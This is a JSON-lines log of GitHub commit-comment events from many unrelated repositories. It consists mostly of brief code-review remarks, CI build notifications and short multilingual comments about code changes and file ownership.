{"id":"4643506939","type":"CommitCommentEvent","actor":{"login":"netojoaobatista"},"repo":{"name":"DeveloperCielo/Webservice-1.5"},"payload":{"comment":{"id":19241066,"position":null,"line":null,"path":null,"commit_id":"f9ca53cb918c1bcbd43d7cfed44ebc22d1fbde09","created_at":"2016-09-30T13:43:15Z","updated_at":"2016-09-30T13:43:15Z","body":"Você está certo.\r\n\r\nEssa recomendação existe para evitar que integradores que estejam utilizando tecnologias mais antigas tenham problemas. Digamos que é apenas uma forma de antecipar possíveis problemas.\r\n\r\n:smile: "}},"created_at":"2016-09-30T13:43:15Z"}
{"id":"4643507458","type":"CommitCommentEvent","actor":{"login":"yanboliang"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19241067,"position":229,"line":283,"path":"mllib/src/main/scala/org/apache/spark/ml/classification/NaiveBayes.scala","commit_id":"1fad5596885aab8b32d2307c0edecbae50d5bd7a","created_at":"2016-09-30T13:43:21Z","updated_at":"2016-09-30T13:43:21Z","body":"@zhengruifeng I found we should not change here, it was used to maintain compatibility with version before 2.0. Could you send a follow-up PR to address this issue? Thanks."}},"created_at":"2016-09-30T13:43:21Z"}
{"id":"4643507471","type":"CommitCommentEvent","actor":{"login":"deniscostadsc"},"repo":{"name":"pixelated/pixelated-user-agent"},"payload":{"comment":{"id":19241068,"position":null,"line":null,"path":null,"commit_id":"bc82002e703118b2347c59106080da03ea69b5c8","created_at":"2016-09-30T13:43:21Z","updated_at":"2016-09-30T13:43:21Z","body":"@mnandri \r\n\r\nIs this related to #684?"}},"created_at":"2016-09-30T13:43:21Z"}
{"id":"4643509603","type":"CommitCommentEvent","actor":{"login":"daniel-j-h"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":19241076,"position":4,"line":75,"path":"include/engine/api/route_parameters.hpp","commit_id":"fa525ad610af14c03edcd366571c51c100f61d08","created_at":"2016-09-30T13:43:44Z","updated_at":"2016-09-30T13:43:44Z","body":"For the record, this changes the `libosrm` API and should have been a major version bump. This requires clients to adapt their code during minor version upgrades. Not cool :("}},"created_at":"2016-09-30T13:43:44Z"}
{"id":"4643510046","type":"CommitCommentEvent","actor":{"login":"mfrederic"},"repo":{"name":"docdoku/docdoku-plm"},"payload":{"comment":{"id":19241077,"position":null,"line":null,"path":null,"commit_id":"01385e412f47f79e7a24f37cf42d7fd8e5484cbf","created_at":"2016-09-30T13:43:50Z","updated_at":"2016-09-30T13:43:50Z","body":"Close issue #1063 "}},"created_at":"2016-09-30T13:43:50Z"}
{"id":"4643510707","type":"CommitCommentEvent","actor":{"login":"seh"},"repo":{"name":"go-kit/kit"},"payload":{"comment":{"id":19241079,"position":12,"line":12,"path":"sd/consul/integration_test.go","commit_id":"9a19822c46c494bdac0944b8e5da6fc8684536e7","created_at":"2016-09-30T13:43:57Z","updated_at":"2016-09-30T13:43:57Z","body":"See #366."}},"created_at":"2016-09-30T13:43:57Z"}
{"id":"4643514535","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/eris-abi"},"payload":{"comment":{"id":19241094,"position":95,"line":99,"path":"core/core.go","commit_id":"540864a31b5cd5e504a1ea13367fc67c59c68387","created_at":"2016-09-30T13:44:39Z","updated_at":"2016-09-30T13:44:39Z","body":"You can safely drop the `interface{}(...)` wrap."}},"created_at":"2016-09-30T13:44:39Z"}
{"id":"4643514850","type":"CommitCommentEvent","actor":{"login":"andreaiacono"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19241095,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T13:44:42Z","updated_at":"2016-09-30T13:44:42Z","body":"Sorry, that was an old page; the project is here: [](http://neuroph.sourceforge.net/index.html)\r\nIf you want to use eigenfaces, take a look at this tutorial: [](http://docs.opencv.org/3.1.0/da/d60/tutorial_face_main.html)\r\nThe class that manages face recognition in my project is this: \r\n[](https://github.com/andreaiacono/OpenCVDemo/blob/master/src/main/java/org/opencv/demo/core/RecognizerManager.java)\r\nIn the constructor, it loads and train the images of the faces, and in the method `recognizeFace()`  if takes an image as input and tries to recognize one of the previously trained faces, giving also an accuracy.\r\n\r\nAndrea\r\n"}},"created_at":"2016-09-30T13:44:42Z"}
{"id":"4643515780","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241098,"position":17,"line":17,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:44:54Z","updated_at":"2016-09-30T13:44:54Z","body":"why to use inline styles when you are using CSS?"}},"created_at":"2016-09-30T13:44:54Z"}
{"id":"4643518033","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241105,"position":4,"line":8,"path":"src/index.html","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:45:17Z","updated_at":"2016-09-30T13:45:17Z","body":"what about moving this to separate css file, then it can be cached"}},"created_at":"2016-09-30T13:45:17Z"}
{"id":"4643518091","type":"CommitCommentEvent","actor":{"login":"skyline75489"},"repo":{"name":"HIT-Alibaba/interview"},"payload":{"comment":{"id":19241106,"position":null,"line":null,"path":null,"commit_id":"1128dabc146f8ef9dca9fbc1e4bd443ab780a61a","created_at":"2016-09-30T13:45:17Z","updated_at":"2016-09-30T13:45:17Z","body":"这里为什么要删去原句？感觉只是做的补充，不是互相冲突的内容"}},"created_at":"2016-09-30T13:45:17Z"}
{"id":"4643520659","type":"CommitCommentEvent","actor":{"login":"nejdetckenobi"},"repo":{"name":"bayraktarulku/ivy_lee"},"payload":{"comment":{"id":19241112,"position":5,"line":69,"path":"app/static/css/style.css","commit_id":"b7921506736fb88b8e7e0b325cd34fa729c618b8","created_at":"2016-09-30T13:45:44Z","updated_at":"2016-09-30T13:45:44Z","body":"Ahahahah"}},"created_at":"2016-09-30T13:45:44Z"}
{"id":"4643521519","type":"CommitCommentEvent","actor":{"login":"Dorkstars"},"repo":{"name":"consolidation/Robo"},"payload":{"comment":{"id":19241115,"position":null,"line":null,"path":null,"commit_id":"551a819e7613bed45404641e52c90f0368e9b309","created_at":"2016-09-30T13:45:53Z","updated_at":"2016-09-30T13:45:53Z","body":"@greg-1-anderson Hello, thank you for solution, but is it possible to add robo-paracept extension to .phar file which was created using your early mentioned fix? want to use robo globally with this extension, Thank You :) "}},"created_at":"2016-09-30T13:45:53Z"}
{"id":"4643521671","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/eris-abi"},"payload":{"comment":{"id":19241117,"position":96,"line":100,"path":"core/core.go","commit_id":"540864a31b5cd5e504a1ea13367fc67c59c68387","created_at":"2016-09-30T13:45:55Z","updated_at":"2016-09-30T13:45:55Z","body":"You can probably combine both `Int` and `Int64` under the same case: they both return the same value."}},"created_at":"2016-09-30T13:45:55Z"}
{"id":"4643523372","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241124,"position":22,"line":22,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:46:13Z","updated_at":"2016-09-30T13:46:13Z","body":"we are using destructing for props and others\r\n"}},"created_at":"2016-09-30T13:46:13Z"}
{"id":"4643524968","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19241128,"position":null,"line":null,"path":null,"commit_id":"c78fd069f29d628ad5f34c0a942627211c8c71fb","created_at":"2016-09-30T13:46:29Z","updated_at":"2016-09-30T13:46:29Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ekQ6YatKTU-mukVR8SvRkg"}},"created_at":"2016-09-30T13:46:29Z"}
{"id":"4643525729","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241129,"position":16,"line":16,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:46:37Z","updated_at":"2016-09-30T13:46:37Z","body":"`const { calculator: { amount } } = this.props`"}},"created_at":"2016-09-30T13:46:37Z"}
{"id":"4643527562","type":"CommitCommentEvent","actor":{"login":"juliusv"},"repo":{"name":"prometheus/prometheus"},"payload":{"comment":{"id":19241131,"position":16,"line":195,"path":"config/config.go","commit_id":"4520e124403b234ef973636dc4c17e197ad423b4","created_at":"2016-09-30T13:46:56Z","updated_at":"2016-09-30T13:46:56Z","body":"Ok, I had indeed just assumed one relabel config per remote write config (and wasn't sure if we'd still have graphite etc. around when it came to the time of having remote write relabeling). As for SD, I'm not sure, but if you mean that SD is a second mechanism to configure multiple endpoints, then I would have naively assumed that each remote write config would have had its own SD config (so you could discover different sets of endpoints for each generic remote write config).\r\n\r\nAnyways, fine with making it just one again for now."}},"created_at":"2016-09-30T13:46:56Z"}
{"id":"4643528021","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/eris-abi"},"payload":{"comment":{"id":19241133,"position":95,"line":99,"path":"core/core.go","commit_id":"540864a31b5cd5e504a1ea13367fc67c59c68387","created_at":"2016-09-30T13:47:02Z","updated_at":"2016-09-30T13:47:02Z","body":"`Uint32` parsed as 32 bit but returns a simple `val` (`int64`)."}},"created_at":"2016-09-30T13:47:02Z"}
{"id":"4643529104","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241136,"position":29,"line":29,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:47:13Z","updated_at":"2016-09-30T13:47:13Z","body":"interesting way to insert space into html"}},"created_at":"2016-09-30T13:47:13Z"}
{"id":"4643530973","type":"CommitCommentEvent","actor":{"login":"touv"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19241146,"position":null,"line":null,"path":null,"commit_id":"9424ef2a20d33a84cef2a90755caaecf5a991ea8","created_at":"2016-09-30T13:47:32Z","updated_at":"2016-09-30T13:47:32Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Limiter le nombre de doc affiché par défaut sur la page overview](https://trello.com/c/0NSLDfD6/45-limiter-le-nombre-de-doc-affiche-par-defaut-sur-la-page-overview)"}},"created_at":"2016-09-30T13:47:32Z"}
{"id":"4643531751","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241150,"position":1,"line":1,"path":".gitmodules","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:47:39Z","updated_at":"2016-09-30T13:47:39Z","body":"Ce n'est pas moi !"}},"created_at":"2016-09-30T13:47:39Z"}
{"id":"4643532759","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241153,"position":32,"line":32,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:47:50Z","updated_at":"2016-09-30T13:47:50Z","body":"you are duplicating same code as above, but with different prop. What about some extraction?"}},"created_at":"2016-09-30T13:47:50Z"}
{"id":"4643533782","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241157,"position":null,"line":null,"path":null,"commit_id":"ca9b159a80e3db19de9b675f9ee527063c25a613","created_at":"2016-09-30T13:48:00Z","updated_at":"2016-09-30T13:48:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1223](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14704&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T13:48:00Z"}
{"id":"4643533927","type":"CommitCommentEvent","actor":{"login":"leifwickland"},"repo":{"name":"tpolecat/doobie"},"payload":{"comment":{"id":19241159,"position":33,"line":45,"path":"yax/core/src/main/scala/doobie/util/log.scala","commit_id":"2d0e4b40bb53c9a067ae13b57f53033ddce504f3","created_at":"2016-09-30T13:48:01Z","updated_at":"2016-09-30T13:48:01Z","body":"Nitpick: the names of the durations no longer should include \"ms\". "}},"created_at":"2016-09-30T13:48:01Z"}
{"id":"4643535826","type":"CommitCommentEvent","actor":{"login":"luipir"},"repo":{"name":"boundlessgeo/qgis-geoserver-plugin"},"payload":{"comment":{"id":19241163,"position":13,"line":29,"path":"geoserverexplorer/gui/dialogs/catalogdialog.py","commit_id":"07689016738b9dd3858a50eb1dc24aa71e533b15","created_at":"2016-09-30T13:48:21Z","updated_at":"2016-09-30T13:48:21Z","body":"sorry... is there"}},"created_at":"2016-09-30T13:48:21Z"}
{"id":"4643535972","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241164,"position":2,"line":2,"path":".gitmodules","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:48:23Z","updated_at":"2016-09-30T13:48:23Z","body":"Ce n'est pas moi !"}},"created_at":"2016-09-30T13:48:23Z"}
{"id":"4643536846","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19241169,"position":null,"line":null,"path":null,"commit_id":"ca9b159a80e3db19de9b675f9ee527063c25a613","created_at":"2016-09-30T13:48:32Z","updated_at":"2016-09-30T13:48:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1223](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14704&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:33"}},"created_at":"2016-09-30T13:48:32Z"}
{"id":"4643537613","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241173,"position":1,"line":13,"path":"README.md","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:48:41Z","updated_at":"2016-09-30T13:48:41Z","body":"Ce n'est pas moi !"}},"created_at":"2016-09-30T13:48:41Z"}
{"id":"4643537615","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241172,"position":46,"line":46,"path":"src/routes/Calculator/components/Calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:48:41Z","updated_at":"2016-09-30T13:48:41Z","body":"we are using shortcuts: \r\n```\r\nimport React, { PropTypes as RPT } from 'react';\r\n\r\ncalculator: RPT.object.isRequired\r\n```"}},"created_at":"2016-09-30T13:48:41Z"}
{"id":"4643544041","type":"CommitCommentEvent","actor":{"login":"fbwkzl333"},"repo":{"name":"fbwkzl333/test-repository"},"payload":{"comment":{"id":19241186,"position":null,"line":null,"path":null,"commit_id":"1fab854365fcfb5edfe852206c50c1410fff9edc","created_at":"2016-09-30T13:49:39Z","updated_at":"2016-09-30T13:49:39Z","body":"연습장"}},"created_at":"2016-09-30T13:49:39Z"}
{"id":"4643545090","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241188,"position":1,"line":1,"path":"Recorderjs-master/.gitignore","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:49:50Z","updated_at":"2016-09-30T13:49:50Z","body":"Tout le dossier Recorderjs-master est à moi !"}},"created_at":"2016-09-30T13:49:50Z"}
{"id":"4643546351","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241189,"position":17,"line":17,"path":"src/routes/Calculator/containers/CalculatorContainer.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:50:03Z","updated_at":"2016-09-30T13:50:03Z","body":"This constraints should be fetched on startup of application, not hardcoded like this. You are using API and when API values changes (some update in DB etc.) your application will be broken"}},"created_at":"2016-09-30T13:50:03Z"}
{"id":"4643546818","type":"CommitCommentEvent","actor":{"login":"Pooja-hj"},"repo":{"name":"Pooja-hj/p5"},"payload":{"comment":{"id":19241192,"position":1,"line":1,"path":".gitignore","commit_id":"c7dd5d7f08037573f913269bac29c2ee342e255f","created_at":"2016-09-30T13:50:09Z","updated_at":"2016-09-30T13:50:09Z","body":"#include<iostream.h>"}},"created_at":"2016-09-30T13:50:09Z"}
{"id":"4643547387","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19241193,"position":12,"line":17,"path":"index.js","commit_id":"cbccaf2ac55fa172c59891a9648dd45ab1ec1ded","created_at":"2016-09-30T13:50:14Z","updated_at":"2016-09-30T13:50:14Z","body":"I understand. However, in trying to imitate what I think how `http` would behave *if* it were to support `baseUrl` itself and to follow a precedent, Express, I am convinced that this is the most right way to go.\r\n\r\nThere is [express-autoserve](https://github.com/binki/express-autoserve) which adapts to that framework and the same should probably be done for any other frameworks which are incompatible. Also, it seems odd to me that Express is incapable of coping with `baseUrl` when it expects middleware and handlers to be. It must be cheating with `instanceof` or something, so maybe that’s something that could be fixed there…"}},"created_at":"2016-09-30T13:50:14Z"}
{"id":"4643547917","type":"CommitCommentEvent","actor":{"login":"tafaRU"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19241194,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T13:50:19Z","updated_at":"2016-09-30T13:50:19Z","body":":metal"}},"created_at":"2016-09-30T13:50:19Z"}
{"id":"4643548210","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19241196,"position":14,"line":71,"path":"compiler/frontend.java/src/org/jetbrains/kotlin/resolve/jvm/TopDownAnalyzerFacadeForJVM.kt","commit_id":"d9b97ca97cceaed3164a50960d4cae8f518c1caa","created_at":"2016-09-30T13:50:22Z","updated_at":"2016-09-30T13:50:22Z","body":"It could be, but this object is refactored in further commits"}},"created_at":"2016-09-30T13:50:22Z"}
{"id":"4643549623","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241201,"position":1,"line":1,"path":"angular-seed","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:50:36Z","updated_at":"2016-09-30T13:50:36Z","body":"c'est à moi , mais c'est un dossier que j'ai supprimé !"}},"created_at":"2016-09-30T13:50:36Z"}
{"id":"4643551110","type":"CommitCommentEvent","actor":{"login":"pietv"},"repo":{"name":"eris-ltd/eris-abi"},"payload":{"comment":{"id":19241207,"position":166,"line":170,"path":"core/core.go","commit_id":"540864a31b5cd5e504a1ea13367fc67c59c68387","created_at":"2016-09-30T13:50:51Z","updated_at":"2016-09-30T13:50:51Z","body":"The `packInterfaceValue` returns an `interface{}` and does the picking by itself. I think you can group all of the cycles by declaring: \r\n```\r\nvalArr := make([]interface{}, 0, len(arr)`\r\n```\r\nand relying on `packInterfaceValue(...)` to detect types: it will return and `interface{}` anyway, but the elements in in the slice will be of a proper type. So, you'll have all the `range` cycles under one `case`"}},"created_at":"2016-09-30T13:50:51Z"}
{"id":"4643551661","type":"CommitCommentEvent","actor":{"login":"anish006"},"repo":{"name":"SolutionShare/SolutionShare.github.io"},"payload":{"comment":{"id":19241208,"position":13,"line":14,"path":"README.md","commit_id":"5a97e7e4a6e55c85913f6601e66f6b36fe12d2cb","created_at":"2016-09-30T13:50:57Z","updated_at":"2016-09-30T13:50:57Z","body":"student number = 8314601"}},"created_at":"2016-09-30T13:50:57Z"}
{"id":"4643554387","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241220,"position":39,"line":39,"path":"src/routes/Calculator/containers/CalculatorContainer.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:51:28Z","updated_at":"2016-09-30T13:51:28Z","body":"you could use destructuring here:\r\n{\r\n  calculator: state.calculator,\r\n  ...data\r\n}\r\n```\r\n\r\n"}},"created_at":"2016-09-30T13:51:28Z"}
{"id":"4643555186","type":"CommitCommentEvent","actor":{"login":"redlulz"},"repo":{"name":"Logitech/slimserver"},"payload":{"comment":{"id":19241222,"position":null,"line":null,"path":null,"commit_id":"048572521ba0c9af6924d4ed1790ecfc3fc1bbe0","created_at":"2016-09-30T13:51:36Z","updated_at":"2016-09-30T13:51:36Z","body":"$name is undefined there"}},"created_at":"2016-09-30T13:51:36Z"}
{"id":"4643555609","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241226,"position":37,"line":37,"path":"src/routes/Calculator/containers/CalculatorContainer.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:51:41Z","updated_at":"2016-09-30T13:51:41Z","body":"({ calculator }) => ({"}},"created_at":"2016-09-30T13:51:41Z"}
{"id":"4643559207","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241231,"position":1,"line":63,"path":"backend/i18n/locales/en.json","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:52:20Z","updated_at":"2016-09-30T13:52:20Z","body":"tout ce qui est dans backend/i18n/ n'est pas à moi"}},"created_at":"2016-09-30T13:52:20Z"}
{"id":"4643559548","type":"CommitCommentEvent","actor":{"login":"bgrainger"},"repo":{"name":"bgrainger/MySqlConnector"},"payload":{"comment":{"id":19241235,"position":null,"line":null,"path":null,"commit_id":"09b45fce026fdc77db94ab9262de10f414ed85a0","created_at":"2016-09-30T13:52:24Z","updated_at":"2016-09-30T13:52:24Z","body":"Connecting directly to an IP address was introduced in 8bcfc3b3fc41a964eadb65c502afa37124f9a0d1 for the reasons listed there. We'd need to check if Core CLR actually supports connecting to a hostname now before switching back.\r\n\r\nBut even if it does, the synchronous `Connect` call on Linux wasn't being cancelled (even though that code works fine under CoreCLR on Windows). This breaks the connect timeout, so it can't be used. "}},"created_at":"2016-09-30T13:52:24Z"}
{"id":"4643560423","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"zllikey/Mytv"},"payload":{"comment":{"id":19241239,"position":null,"line":null,"path":null,"commit_id":"5ca419b974abd68c0b95eb26c4984dfb9d46cd9b","created_at":"2016-09-30T13:52:34Z","updated_at":"2016-09-30T13:52:34Z","body":"楼主 请问现在新GOTV 有没有新的下载方法 "}},"created_at":"2016-09-30T13:52:34Z"}
{"id":"4643562217","type":"CommitCommentEvent","actor":{"login":"wangshuai12345"},"repo":{"name":"wangshuai12345/learn"},"payload":{"comment":{"id":19241245,"position":2,"line":2,"path":"README.md","commit_id":"7f150c0144634603a5c54fc58b11e14f5ce04ebb","created_at":"2016-09-30T13:52:53Z","updated_at":"2016-09-30T13:52:53Z","body":" $ git push -u origin master"}},"created_at":"2016-09-30T13:52:53Z"}
{"id":"4643563212","type":"CommitCommentEvent","actor":{"login":"zhengruifeng"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19241248,"position":229,"line":283,"path":"mllib/src/main/scala/org/apache/spark/ml/classification/NaiveBayes.scala","commit_id":"1fad5596885aab8b32d2307c0edecbae50d5bd7a","created_at":"2016-09-30T13:53:04Z","updated_at":"2016-09-30T13:53:04Z","body":"OK, ASAP"}},"created_at":"2016-09-30T13:53:04Z"}
{"id":"4643563377","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241249,"position":4,"line":4,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:53:07Z","updated_at":"2016-09-30T13:53:07Z","body":"this can be one action.... `CALCULATOR_VALUE_CHANGE`\r\n"}},"created_at":"2016-09-30T13:53:07Z"}
{"id":"4643564687","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241257,"position":1,"line":22,"path":"backend/webserver/myUpload.js","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:53:20Z","updated_at":"2016-09-30T13:53:20Z","body":"Le fichier myUpload.js est le mien !"}},"created_at":"2016-09-30T13:53:20Z"}
{"id":"4643567008","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241267,"position":17,"line":17,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:53:46Z","updated_at":"2016-09-30T13:53:46Z","body":"actions should have clean api, and components should send correct values to them"}},"created_at":"2016-09-30T13:53:46Z"}
{"id":"4643567682","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241268,"position":1,"line":65,"path":"frontend/css/live-conference.less","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:53:53Z","updated_at":"2016-09-30T13:53:53Z","body":"Ce n'est pas moi !"}},"created_at":"2016-09-30T13:53:53Z"}
{"id":"4643568286","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241271,"position":2,"line":66,"path":"frontend/css/live-conference.less","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:54:00Z","updated_at":"2016-09-30T13:54:00Z","body":"Ce n'est pas moi !"}},"created_at":"2016-09-30T13:54:00Z"}
{"id":"4643569180","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241276,"position":20,"line":20,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:54:10Z","updated_at":"2016-09-30T13:54:10Z","body":"this action is basically copy of `handleAmountChange`"}},"created_at":"2016-09-30T13:54:10Z"}
{"id":"4643572321","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241282,"position":1,"line":187,"path":"frontend/js/modules/conference/conference.js","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:54:42Z","updated_at":"2016-09-30T13:54:42Z","body":"les modifications sur ce fichier sont à moi !"}},"created_at":"2016-09-30T13:54:42Z"}
{"id":"4643573202","type":"CommitCommentEvent","actor":{"login":"noughts"},"repo":{"name":"firebase/Firebase-Unity"},"payload":{"comment":{"id":19241284,"position":null,"line":null,"path":null,"commit_id":"0ca1be723ae8ff4403b9b13d833c14da2cebd963","created_at":"2016-09-30T13:54:52Z","updated_at":"2016-09-30T13:54:52Z","body":"I'm glad to hear this :-)"}},"created_at":"2016-09-30T13:54:52Z"}
{"id":"4643576096","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241288,"position":1,"line":2,"path":"frontend/views/live-conference/partials/conference.jade","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:55:22Z","updated_at":"2016-09-30T13:55:22Z","body":"j'ai apporté des modifications à ce fichier !"}},"created_at":"2016-09-30T13:55:22Z"}
{"id":"4643576614","type":"CommitCommentEvent","actor":{"login":"btcdrak"},"repo":{"name":"jl2012/bips"},"payload":{"comment":{"id":19241289,"position":3,"line":3,"path":"bip-sighash.mediawiki","commit_id":"021d25bd6b36d7033ac10c7e43adc94b3c0c271f","created_at":"2016-09-30T13:55:28Z","updated_at":"2016-09-30T13:55:28Z","body":"s/operation/operations/"}},"created_at":"2016-09-30T13:55:28Z"}
{"id":"4643577205","type":"CommitCommentEvent","actor":{"login":"SamyBen"},"repo":{"name":"SamyBen/hublin"},"payload":{"comment":{"id":19241291,"position":1,"line":9,"path":"frontend/views/modules/live-conference/browser-authorization-dialog.jade","commit_id":"7bb91d81aea64f6f34afcff86fa802a1ad636219","created_at":"2016-09-30T13:55:34Z","updated_at":"2016-09-30T13:55:34Z","body":"Ce n'est pas moi !"}},"created_at":"2016-09-30T13:55:34Z"}
{"id":"4643577589","type":"CommitCommentEvent","actor":{"login":"ondrejbartas"},"repo":{"name":"michalgritzbach/loan"},"payload":{"comment":{"id":19241292,"position":49,"line":49,"path":"src/routes/Calculator/modules/calculator.js","commit_id":"1b7342b410118af6934085bf361d392c3addfbc7","created_at":"2016-09-30T13:55:38Z","updated_at":"2016-09-30T13:55:38Z","body":"you could do something like: \r\n```js\r\nconst ACTION_HANDLERS = {\r\n   [CALCULATOR_VALUE_CHANGE]: (state, { field, payload }) => ({ ...state, [field]: payload }),\r\n}\r\n```"}},"created_at":"2016-09-30T13:55:38Z"}
